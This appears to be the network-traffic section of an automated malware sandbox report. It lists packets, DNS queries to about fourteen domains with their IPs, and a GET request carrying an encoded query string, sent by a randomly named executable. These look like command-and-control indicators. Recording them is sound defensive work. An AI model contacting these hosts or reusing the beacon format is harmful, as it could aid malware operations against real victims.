                                                                          Dec 2, 2023 18:50:46.275976896 CET4976280192.168.2.5185.74.252.11
                                                                          Dec 2, 2023 18:50:46.275976896 CET4976280192.168.2.5185.74.252.11
                                                                          Dec 2, 2023 18:50:46.275976896 CET4976280192.168.2.5185.74.252.11
                                                                          Dec 2, 2023 18:50:46.276021957 CET4976280192.168.2.5185.74.252.11
                                                                          Dec 2, 2023 18:50:46.276021957 CET4976280192.168.2.5185.74.252.11
                                                                          Dec 2, 2023 18:50:46.276129961 CET8049762185.74.252.11192.168.2.5
                                                                          Dec 2, 2023 18:50:46.276161909 CET8049762185.74.252.11192.168.2.5
                                                                          Dec 2, 2023 18:50:46.276168108 CET4976280192.168.2.5185.74.252.11
                                                                          Dec 2, 2023 18:50:46.276180983 CET8049762185.74.252.11192.168.2.5
                                                                          Dec 2, 2023 18:50:46.276199102 CET8049762185.74.252.11192.168.2.5
                                                                          Dec 2, 2023 18:50:46.276200056 CET4976280192.168.2.5185.74.252.11
                                                                          Dec 2, 2023 18:50:46.276215076 CET4976280192.168.2.5185.74.252.11
                                                                          Dec 2, 2023 18:50:46.276228905 CET4976280192.168.2.5185.74.252.11
                                                                          Dec 2, 2023 18:50:46.276334047 CET8049762185.74.252.11192.168.2.5
                                                                          Dec 2, 2023 18:50:46.276351929 CET8049762185.74.252.11192.168.2.5
                                                                          Dec 2, 2023 18:50:46.276371002 CET4976280192.168.2.5185.74.252.11
                                                                          Dec 2, 2023 18:50:46.276382923 CET4976280192.168.2.5185.74.252.11
                                                                          Dec 2, 2023 18:50:47.147875071 CET4976380192.168.2.5185.74.252.11
                                                                          Dec 2, 2023 18:50:47.331010103 CET8049763185.74.252.11192.168.2.5
                                                                          Dec 2, 2023 18:50:47.331150055 CET4976380192.168.2.5185.74.252.11
                                                                          Dec 2, 2023 18:50:47.331485033 CET4976380192.168.2.5185.74.252.11
                                                                          Dec 2, 2023 18:50:47.514452934 CET8049763185.74.252.11192.168.2.5
                                                                          Dec 2, 2023 18:50:47.976064920 CET8049763185.74.252.11192.168.2.5
                                                                          Dec 2, 2023 18:50:47.976089954 CET8049763185.74.252.11192.168.2.5
                                                                          Dec 2, 2023 18:50:47.976211071 CET4976380192.168.2.5185.74.252.11
                                                                          Dec 2, 2023 18:50:47.976382971 CET4976380192.168.2.5185.74.252.11
                                                                          Dec 2, 2023 18:50:48.159313917 CET8049763185.74.252.11192.168.2.5
                                                                          Dec 2, 2023 18:50:54.802369118 CET4976480192.168.2.534.120.55.112
                                                                          Dec 2, 2023 18:50:54.901346922 CET804976434.120.55.112192.168.2.5
                                                                          Dec 2, 2023 18:50:54.901494026 CET4976480192.168.2.534.120.55.112
                                                                          Dec 2, 2023 18:50:54.901721954 CET4976480192.168.2.534.120.55.112
                                                                          Dec 2, 2023 18:50:55.000521898 CET804976434.120.55.112192.168.2.5
                                                                          Dec 2, 2023 18:50:55.189815044 CET804976434.120.55.112192.168.2.5
                                                                          Dec 2, 2023 18:50:55.189846039 CET804976434.120.55.112192.168.2.5
                                                                          Dec 2, 2023 18:50:55.189887047 CET4976480192.168.2.534.120.55.112
                                                                          Dec 2, 2023 18:50:56.413702965 CET4976480192.168.2.534.120.55.112
                                                                          Dec 2, 2023 18:50:57.439064980 CET4976580192.168.2.534.120.55.112
                                                                          Dec 2, 2023 18:50:57.538281918 CET804976534.120.55.112192.168.2.5
                                                                          Dec 2, 2023 18:50:57.538682938 CET4976580192.168.2.534.120.55.112
                                                                          Dec 2, 2023 18:50:57.538683891 CET4976580192.168.2.534.120.55.112
                                                                          Dec 2, 2023 18:50:57.637918949 CET804976534.120.55.112192.168.2.5
                                                                          Dec 2, 2023 18:50:57.831825018 CET804976534.120.55.112192.168.2.5
                                                                          Dec 2, 2023 18:50:57.831876993 CET804976534.120.55.112192.168.2.5
                                                                          Dec 2, 2023 18:50:57.834918022 CET4976580192.168.2.534.120.55.112
                                                                          Dec 2, 2023 18:50:59.053812027 CET4976580192.168.2.534.120.55.112
                                                                          Dec 2, 2023 18:51:00.069958925 CET4976680192.168.2.534.120.55.112
                                                                          Dec 2, 2023 18:51:00.168982029 CET804976634.120.55.112192.168.2.5
                                                                          Dec 2, 2023 18:51:00.169183016 CET4976680192.168.2.534.120.55.112
                                                                          Dec 2, 2023 18:51:00.169476986 CET4976680192.168.2.534.120.55.112
                                                                          Dec 2, 2023 18:51:00.268402100 CET804976634.120.55.112192.168.2.5
                                                                          Dec 2, 2023 18:51:00.268430948 CET804976634.120.55.112192.168.2.5
                                                                          Dec 2, 2023 18:51:00.461985111 CET804976634.120.55.112192.168.2.5
                                                                          Dec 2, 2023 18:51:00.462019920 CET804976634.120.55.112192.168.2.5
                                                                          Dec 2, 2023 18:51:00.462064028 CET4976680192.168.2.534.120.55.112
                                                                          Dec 2, 2023 18:51:01.678885937 CET4976680192.168.2.534.120.55.112
                                                                          Dec 2, 2023 18:51:02.694853067 CET4976780192.168.2.534.120.55.112
                                                                          Dec 2, 2023 18:51:02.794045925 CET804976734.120.55.112192.168.2.5
                                                                          Dec 2, 2023 18:51:02.794198036 CET4976780192.168.2.534.120.55.112
                                                                          Dec 2, 2023 18:51:02.794456959 CET4976780192.168.2.534.120.55.112
                                                                          Dec 2, 2023 18:51:02.893466949 CET804976734.120.55.112192.168.2.5
                                                                          Dec 2, 2023 18:51:03.085356951 CET804976734.120.55.112192.168.2.5
                                                                          Dec 2, 2023 18:51:03.093022108 CET804976734.120.55.112192.168.2.5
                                                                          Dec 2, 2023 18:51:03.093049049 CET804976734.120.55.112192.168.2.5
                                                                          Dec 2, 2023 18:51:03.093064070 CET804976734.120.55.112192.168.2.5
                                                                          Dec 2, 2023 18:51:03.093077898 CET804976734.120.55.112192.168.2.5
                                                                          Dec 2, 2023 18:51:03.093092918 CET804976734.120.55.112192.168.2.5
                                                                          Dec 2, 2023 18:51:03.093144894 CET4976780192.168.2.534.120.55.112
                                                                          Dec 2, 2023 18:51:03.093183994 CET4976780192.168.2.534.120.55.112
                                                                          Dec 2, 2023 18:51:03.093436003 CET4976780192.168.2.534.120.55.112
                                                                          Dec 2, 2023 18:51:03.195749998 CET804976734.120.55.112192.168.2.5
                                                                          Dec 2, 2023 18:51:08.603564978 CET4976880192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:08.783247948 CET804976837.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:08.783348083 CET4976880192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:08.783616066 CET4976880192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:08.963202000 CET804976837.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:08.963330030 CET4976880192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:10.288276911 CET4976880192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:11.304236889 CET4976980192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:11.488523960 CET804976937.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:11.488713980 CET4976980192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:11.489062071 CET4976980192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:11.673322916 CET804976937.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:11.673472881 CET4976980192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:12.991390944 CET4976980192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:14.007294893 CET4977080192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:14.187477112 CET804977037.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:14.187634945 CET4977080192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:14.188005924 CET4977080192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:14.368000031 CET804977037.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:14.368026972 CET804977037.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:14.368226051 CET4977080192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:16.319430113 CET4977080192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:17.335419893 CET4977180192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:17.515657902 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:17.515811920 CET4977180192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:17.515954018 CET4977180192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:17.698211908 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:17.698240042 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:17.698252916 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:17.698271036 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:17.698283911 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:17.698297977 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:17.698311090 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:17.698324919 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:17.698322058 CET4977180192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:17.698338032 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:17.698354006 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:17.698365927 CET4977180192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:17.698395967 CET4977180192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:17.878627062 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:17.878658056 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:17.878669977 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:17.878684044 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:17.878700018 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:17.878700972 CET4977180192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:17.878714085 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:17.878727913 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:17.878741980 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:17.878750086 CET4977180192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:17.878756046 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:17.878770113 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:17.878772020 CET4977180192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:17.878777981 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:17.878791094 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:17.878793955 CET4977180192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:17.878806114 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:17.878817081 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:17.878824949 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:17.878833055 CET4977180192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:17.878859043 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:17.878865957 CET4977180192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:17.878875017 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:17.878889084 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:17.878901958 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:17.878916025 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:17.878920078 CET4977180192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:17.879050016 CET4977180192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:18.059015989 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:18.059041977 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:18.059061050 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:18.059072971 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:18.059086084 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:18.059098959 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:18.059102058 CET4977180192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:18.059132099 CET4977180192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:18.059134007 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:18.059149981 CET4977180192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:18.059189081 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:18.059201956 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:18.059225082 CET4977180192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:18.059273958 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:18.059287071 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:18.059304953 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:18.059310913 CET4977180192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:18.059326887 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:18.059339046 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:18.059348106 CET4977180192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:18.059350967 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:18.059365034 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:18.059374094 CET4977180192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:18.059376955 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:18.059390068 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:18.059402943 CET4977180192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:18.059422970 CET4977180192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:18.059437037 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:18.059449911 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:18.059462070 CET804977137.97.254.27192.168.2.5
                                                                          Dec 2, 2023 18:51:18.059493065 CET4977180192.168.2.537.97.254.27
                                                                          Dec 2, 2023 18:51:18.059587002 CET4977180192.168.2.537.97.254.27

                                                                          UDP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Dec 2, 2023 18:47:34.067969084 CET6486953192.168.2.51.1.1.1
                                                                          Dec 2, 2023 18:47:34.466952085 CET53648691.1.1.1192.168.2.5
                                                                          Dec 2, 2023 18:47:44.883730888 CET6510953192.168.2.51.1.1.1
                                                                          Dec 2, 2023 18:47:45.076095104 CET53651091.1.1.1192.168.2.5
                                                                          Dec 2, 2023 18:47:58.352762938 CET5202253192.168.2.51.1.1.1
                                                                          Dec 2, 2023 18:47:58.504232883 CET53520221.1.1.1192.168.2.5
                                                                          Dec 2, 2023 18:48:42.805584908 CET6055953192.168.2.51.1.1.1
                                                                          Dec 2, 2023 18:48:43.380903959 CET53605591.1.1.1192.168.2.5
                                                                          Dec 2, 2023 18:48:57.976696014 CET5491553192.168.2.51.1.1.1
                                                                          Dec 2, 2023 18:48:58.890271902 CET53549151.1.1.1192.168.2.5
                                                                          Dec 2, 2023 18:49:11.977654934 CET5029653192.168.2.51.1.1.1
                                                                          Dec 2, 2023 18:49:12.270356894 CET53502961.1.1.1192.168.2.5
                                                                          Dec 2, 2023 18:49:25.783622026 CET5614953192.168.2.51.1.1.1
                                                                          Dec 2, 2023 18:49:26.041058064 CET53561491.1.1.1192.168.2.5
                                                                          Dec 2, 2023 18:49:40.742309093 CET5947853192.168.2.51.1.1.1
                                                                          Dec 2, 2023 18:49:41.753321886 CET53594781.1.1.1192.168.2.5
                                                                          Dec 2, 2023 18:49:55.023900986 CET6531453192.168.2.51.1.1.1
                                                                          Dec 2, 2023 18:49:55.275090933 CET53653141.1.1.1192.168.2.5
                                                                          Dec 2, 2023 18:50:08.867255926 CET6056453192.168.2.51.1.1.1
                                                                          Dec 2, 2023 18:50:09.447134972 CET53605641.1.1.1192.168.2.5
                                                                          Dec 2, 2023 18:50:23.695529938 CET5397853192.168.2.51.1.1.1
                                                                          Dec 2, 2023 18:50:24.102000952 CET53539781.1.1.1192.168.2.5
                                                                          Dec 2, 2023 18:50:38.399636984 CET6150953192.168.2.51.1.1.1
                                                                          Dec 2, 2023 18:50:39.032430887 CET53615091.1.1.1192.168.2.5
                                                                          Dec 2, 2023 18:50:52.992083073 CET6338753192.168.2.51.1.1.1
                                                                          Dec 2, 2023 18:50:53.992166996 CET6338753192.168.2.51.1.1.1
                                                                          Dec 2, 2023 18:50:54.801028967 CET53633871.1.1.1192.168.2.5
                                                                          Dec 2, 2023 18:50:54.801057100 CET53633871.1.1.1192.168.2.5
                                                                          Dec 2, 2023 18:51:08.101521969 CET6542653192.168.2.51.1.1.1
                                                                          Dec 2, 2023 18:51:08.602231979 CET53654261.1.1.1192.168.2.5

                                                                          DNS Queries

                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                          Dec 2, 2023 18:47:34.067969084 CET192.168.2.51.1.1.10xf92aStandard query (0)www.alldaysslimmingstea.comA (IP address)IN (0x0001)false
                                                                          Dec 2, 2023 18:47:44.883730888 CET192.168.2.51.1.1.10x1e32Standard query (0)www.jones4deepriver.comA (IP address)IN (0x0001)false
                                                                          Dec 2, 2023 18:47:58.352762938 CET192.168.2.51.1.1.10xa22fStandard query (0)www.poria.linkA (IP address)IN (0x0001)false
                                                                          Dec 2, 2023 18:48:42.805584908 CET192.168.2.51.1.1.10xac01Standard query (0)www.makeinai.onlineA (IP address)IN (0x0001)false
                                                                          Dec 2, 2023 18:48:57.976696014 CET192.168.2.51.1.1.10x1f89Standard query (0)www.instantconvey.comA (IP address)IN (0x0001)false
                                                                          Dec 2, 2023 18:49:11.977654934 CET192.168.2.51.1.1.10x4d16Standard query (0)www.domainappraisalbot.comA (IP address)IN (0x0001)false
                                                                          Dec 2, 2023 18:49:25.783622026 CET192.168.2.51.1.1.10x5201Standard query (0)www.nesmalt.infoA (IP address)IN (0x0001)false
                                                                          Dec 2, 2023 18:49:40.742309093 CET192.168.2.51.1.1.10x66c0Standard query (0)www.611erhm.topA (IP address)IN (0x0001)false
                                                                          Dec 2, 2023 18:49:55.023900986 CET192.168.2.51.1.1.10xdfa8Standard query (0)www.fam-scharf.netA (IP address)IN (0x0001)false
                                                                          Dec 2, 2023 18:50:08.867255926 CET192.168.2.51.1.1.10x6f7cStandard query (0)www.magmadokum.comA (IP address)IN (0x0001)false
                                                                          Dec 2, 2023 18:50:23.695529938 CET192.168.2.51.1.1.10xdbd3Standard query (0)www.thecoloringbitch.comA (IP address)IN (0x0001)false
                                                                          Dec 2, 2023 18:50:38.399636984 CET192.168.2.51.1.1.10xd0cStandard query (0)www.altralogos.comA (IP address)IN (0x0001)false
                                                                          Dec 2, 2023 18:50:52.992083073 CET192.168.2.51.1.1.10x700bStandard query (0)www.77moea.topA (IP address)IN (0x0001)false
                                                                          Dec 2, 2023 18:50:53.992166996 CET192.168.2.51.1.1.10x700bStandard query (0)www.77moea.topA (IP address)IN (0x0001)false
                                                                          Dec 2, 2023 18:51:08.101521969 CET192.168.2.51.1.1.10x3136Standard query (0)www.wrautomotive.onlineA (IP address)IN (0x0001)false

                                                                          DNS Answers

                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                          Dec 2, 2023 18:47:34.466952085 CET1.1.1.1192.168.2.50xf92aNo error (0)www.alldaysslimmingstea.comalldaysslimmingstea.comCNAME (Canonical name)IN (0x0001)false
                                                                          Dec 2, 2023 18:47:34.466952085 CET1.1.1.1192.168.2.50xf92aNo error (0)alldaysslimmingstea.com162.222.226.77A (IP address)IN (0x0001)false
                                                                          Dec 2, 2023 18:47:45.076095104 CET1.1.1.1192.168.2.50x1e32No error (0)www.jones4deepriver.com74.208.236.181A (IP address)IN (0x0001)false
                                                                          Dec 2, 2023 18:47:58.504232883 CET1.1.1.1192.168.2.50xa22fNo error (0)www.poria.link172.67.184.73A (IP address)IN (0x0001)false
                                                                          Dec 2, 2023 18:47:58.504232883 CET1.1.1.1192.168.2.50xa22fNo error (0)www.poria.link104.21.18.253A (IP address)IN (0x0001)false
                                                                          Dec 2, 2023 18:48:43.380903959 CET1.1.1.1192.168.2.50xac01No error (0)www.makeinai.online37.140.192.89A (IP address)IN (0x0001)false
                                                                          Dec 2, 2023 18:48:58.890271902 CET1.1.1.1192.168.2.50x1f89No error (0)www.instantconvey.cominstantconvey.comCNAME (Canonical name)IN (0x0001)false
                                                                          Dec 2, 2023 18:48:58.890271902 CET1.1.1.1192.168.2.50x1f89No error (0)instantconvey.com131.153.147.90A (IP address)IN (0x0001)false
                                                                          Dec 2, 2023 18:49:12.270356894 CET1.1.1.1192.168.2.50x4d16No error (0)www.domainappraisalbot.com94.23.162.163A (IP address)IN (0x0001)false
                                                                          Dec 2, 2023 18:49:26.041058064 CET1.1.1.1192.168.2.50x5201No error (0)www.nesmalt.info66.29.155.54A (IP address)IN (0x0001)false
                                                                          Dec 2, 2023 18:49:41.753321886 CET1.1.1.1192.168.2.50x66c0No error (0)www.611erhm.top34.117.26.57A (IP address)IN (0x0001)false
                                                                          Dec 2, 2023 18:49:41.753321886 CET1.1.1.1192.168.2.50x66c0No error (0)www.611erhm.top34.149.198.43A (IP address)IN (0x0001)false
                                                                          Dec 2, 2023 18:49:55.275090933 CET1.1.1.1192.168.2.50xdfa8No error (0)www.fam-scharf.netfam-scharf.netCNAME (Canonical name)IN (0x0001)false
                                                                          Dec 2, 2023 18:49:55.275090933 CET1.1.1.1192.168.2.50xdfa8No error (0)fam-scharf.net81.169.145.70A (IP address)IN (0x0001)false
                                                                          Dec 2, 2023 18:50:09.447134972 CET1.1.1.1192.168.2.50x6f7cNo error (0)www.magmadokum.comredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                          Dec 2, 2023 18:50:09.447134972 CET1.1.1.1192.168.2.50x6f7cNo error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                          Dec 2, 2023 18:50:09.447134972 CET1.1.1.1192.168.2.50x6f7cNo error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                                                          Dec 2, 2023 18:50:24.102000952 CET1.1.1.1192.168.2.50xdbd3No error (0)www.thecoloringbitch.comthecoloringbitch.comCNAME (Canonical name)IN (0x0001)false
                                                                          Dec 2, 2023 18:50:24.102000952 CET1.1.1.1192.168.2.50xdbd3No error (0)thecoloringbitch.com162.241.252.161A (IP address)IN (0x0001)false
                                                                          Dec 2, 2023 18:50:39.032430887 CET1.1.1.1192.168.2.50xd0cNo error (0)www.altralogos.comaltralogos.comCNAME (Canonical name)IN (0x0001)false
                                                                          Dec 2, 2023 18:50:39.032430887 CET1.1.1.1192.168.2.50xd0cNo error (0)altralogos.com185.74.252.11A (IP address)IN (0x0001)false
                                                                          Dec 2, 2023 18:50:54.801028967 CET1.1.1.1192.168.2.50x700bNo error (0)www.77moea.top34.120.55.112A (IP address)IN (0x0001)false
                                                                          Dec 2, 2023 18:50:54.801028967 CET1.1.1.1192.168.2.50x700bNo error (0)www.77moea.top107.178.250.177A (IP address)IN (0x0001)false
                                                                          Dec 2, 2023 18:50:54.801057100 CET1.1.1.1192.168.2.50x700bNo error (0)www.77moea.top34.120.55.112A (IP address)IN (0x0001)false
                                                                          Dec 2, 2023 18:50:54.801057100 CET1.1.1.1192.168.2.50x700bNo error (0)www.77moea.top107.178.250.177A (IP address)IN (0x0001)false
                                                                          Dec 2, 2023 18:51:08.602231979 CET1.1.1.1192.168.2.50x3136No error (0)www.wrautomotive.onlinewrautomotive.onlineCNAME (Canonical name)IN (0x0001)false
                                                                          Dec 2, 2023 18:51:08.602231979 CET1.1.1.1192.168.2.50x3136No error (0)wrautomotive.online37.97.254.27A (IP address)IN (0x0001)false

                                                                          HTTP Request Dependency Graph

                                                                          • www.alldaysslimmingstea.com
                                                                          • www.jones4deepriver.com
                                                                          • www.poria.link
                                                                          • www.makeinai.online
                                                                          • www.instantconvey.com
                                                                          • www.domainappraisalbot.com
                                                                          • www.nesmalt.info
                                                                          • www.611erhm.top
                                                                          • www.fam-scharf.net
                                                                          • www.magmadokum.com
                                                                          • www.thecoloringbitch.com
                                                                          • www.altralogos.com
                                                                          • www.77moea.top
                                                                          • www.wrautomotive.online

                                                                          HTTP Packets

                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          0192.168.2.549716162.222.226.77801600C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Dec 2, 2023 18:47:34.669131994 CET527OUTGET /ahec/?Vjk=-N-tntX&KHcH=0lWeLq0ljZnDSWqKPiItN+dDtGaop8tJSpt/SUCn4seLkPj1kpVBncTOO8qbY1skp8kxUg4twvHodh//BlyQvVPoMkTtjkNnJA== HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Host: www.alldaysslimmingstea.com
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Dec 2, 2023 18:47:34.865154982 CET898INHTTP/1.1 404 Not Found
                                                                          Date: Sat, 02 Dec 2023 17:47:34 GMT
                                                                          Server: Apache
                                                                          Upgrade: h2,h2c
                                                                          Connection: Upgrade, close
                                                                          Last-Modified: Tue, 15 Mar 2022 21:16:32 GMT
                                                                          Accept-Ranges: bytes
                                                                          Content-Length: 583
                                                                          Vary: Accept-Encoding
                                                                          Content-Type: text/html
                                                                          Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 30 64 65 67 29 3b 20 7d 20 31 30 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 33 36 30 64 65 67 29 3b 20 7d 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 5f 73 6b 7a 5f 70 69 64 20 3d 20 22 39 50 4f 42 45 58 38 30 57 22 3b 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 63 64 6e 2e 6a 73 69 6e 69 74 2e 64 69 72 65 63 74 66 77 64 2e 63 6f 6d 2f 73 6b 2d 6a 73 70 61 72 6b 5f 69 6e 69 74 2e 70 68 70 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 61 64 65 72 22 20 69 64 3d 22 73 6b 2d 6c 6f 61 64 65 72 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                          Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } </style> <script language="Javascript">var _skz_pid = "9POBEX80W";</script> <script language="Javascript" src="http://cdn.jsinit.directfwd.com/sk-jspark_init.php"></script></head><body><div class="loader" id="sk-loader"></div></body></html>


